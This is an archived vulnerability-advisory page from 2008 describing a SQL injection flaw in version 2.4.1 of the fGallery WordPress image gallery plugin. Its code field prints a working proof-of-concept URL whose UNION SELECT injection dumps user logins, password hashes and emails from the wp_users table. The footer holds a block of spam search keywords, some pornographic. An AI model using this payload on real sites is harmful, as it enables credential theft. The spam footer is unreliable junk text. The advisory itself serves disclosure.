about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin fGallery SQL Injection Vulnerability


Title WordPress Plugin fGallery SQL Injection Vulnerability
Published 2008-01-27-12:00AM
Updated 2008-01-28-08:27PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  H-T Team discovered this vulnerability.
Vulnerable  fGallery fGallery WordPress image gallery plugin 2.4.1
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 21:13:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.daoxuo naryto sex Crack Data 89sxs freebsd 5. Stores t337t www.savixx t24t &a Animalporn videoporno anema .ved www sex16 hayvan por videoporno 18sexy vid bay myspace.co t337t sof2 anema .ved Sexxxvideo Www.goldmo t291t youtubsex t291t www.102030 x555-info t236t t291t t92t Sexxxvideo ww.porn.co t236t www sex16 Www wabtri Sexxxvideo www.sexima t651t www sex16 t651t Free sex f t651t www.iwant1 sexytv. t416t speed t71t t757t